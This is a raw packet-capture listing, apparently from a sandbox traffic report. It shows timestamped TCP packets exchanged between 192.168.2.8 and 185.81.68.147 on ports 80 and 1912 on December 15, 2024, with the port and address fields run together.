                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.082875967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.083509922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.083579063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.083633900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.084347963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.084455013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.084518909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.085169077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.085290909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.085347891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.086038113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.086153030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.086210966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.086837053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.086947918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.087002993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.087673903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.087802887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.087860107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.088567972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.088690042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.088994026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.089356899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.089524984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.089581013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.090214014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.090351105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.090425014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.091264963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.091351032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.091409922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.091876030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.091967106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.092025995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.092705011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.092912912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.092964888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.093760967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.093867064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.093940020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.094428062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.094526052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.094588995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.095204115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.095365047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.095422983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.096020937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.096107006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.096160889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.096869946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.096955061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.097011089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.097690105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.097788095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.097842932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.098510981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.098628044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.098685980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.099338055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.099468946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.099518061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.100469112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.100653887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.100708008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.101352930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.110992908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111030102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111041069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111053944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111061096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111108065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111771107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111825943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.111834049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.112762928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.112829924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.112831116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.115267992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.115360975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.115370989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.115607023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.115665913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.115706921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.116113901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.116168022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.116202116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.116913080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.116970062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.116985083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.117616892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.117680073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.117721081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.118505001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.118616104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.119256020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.119359016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.120153904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.258352995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.258393049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.258476973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.258570910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.258688927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.258747101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.259516001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.259722948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.259778976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.260570049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.260935068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.260991096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.261275053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.261369944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.261423111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.261985064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.262038946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.262094021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.262897015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.262937069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.262991905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.263576984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.263840914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.263919115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.264620066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.264729977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.264782906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.265301943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.265408993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.265464067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.266064882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.266166925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.266217947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.266927004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.266994953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.267050982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.267851114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.267890930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.267945051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.268739939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.268862963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.268918037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.269413948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.269519091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.269575119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.270303011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.270426035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.270529032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.271087885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.271215916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.271270037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.271907091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.272005081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.272061110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.272783995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.272888899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.272942066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.273587942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.273788929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.273843050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.274427891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.274522066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.274574995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.275360107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.275425911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.275485039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.276191950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.276314974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.276370049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.276947021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.277090073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.277144909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.277769089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.278023958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.278079987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.278606892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.278712034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.278772116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.279419899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.279447079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.279500961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.280278921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.280411959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.280468941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.281096935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.281152010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.281209946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.281929016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.282052040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.282108068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.282753944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.282843113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.283013105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.283600092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.283710003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.283765078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.284423113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.284508944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.284581900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.285234928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.285480976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.285541058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.286111116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.286214113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.286266088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.286930084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.286983013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.287045956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.287789106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.287820101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.287885904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.288605928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.288683891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.288738966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.289432049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.289534092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.289592028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.290323019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.290462971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.290518045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.291098118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.291177034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.291228056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.291933060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.291994095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.292045116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.292814970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.292917967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.292969942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.293534994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.303275108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.303338051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.303462982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.303601027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.303652048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.303705931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.304565907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.304641962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.304699898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.305578947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.305639982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.306869984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.307028055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.307082891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.307267904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.307368040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.307425976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.308099985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.308213949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.308273077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.308917999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.309046984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.309099913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.309763908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.309863091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.309921980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.310585976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.310698032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.310755968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.311414003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.311477900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.311528921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.385085106 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.450762033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.450830936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.450889111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.451092005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.451266050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.451328039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.451889992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.452028036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.452080011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.452713013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.452888966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.452960014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.453752995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.453972101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.454077959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.454432964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.454596043 CET8049709185.81.68.147192.168.2.8
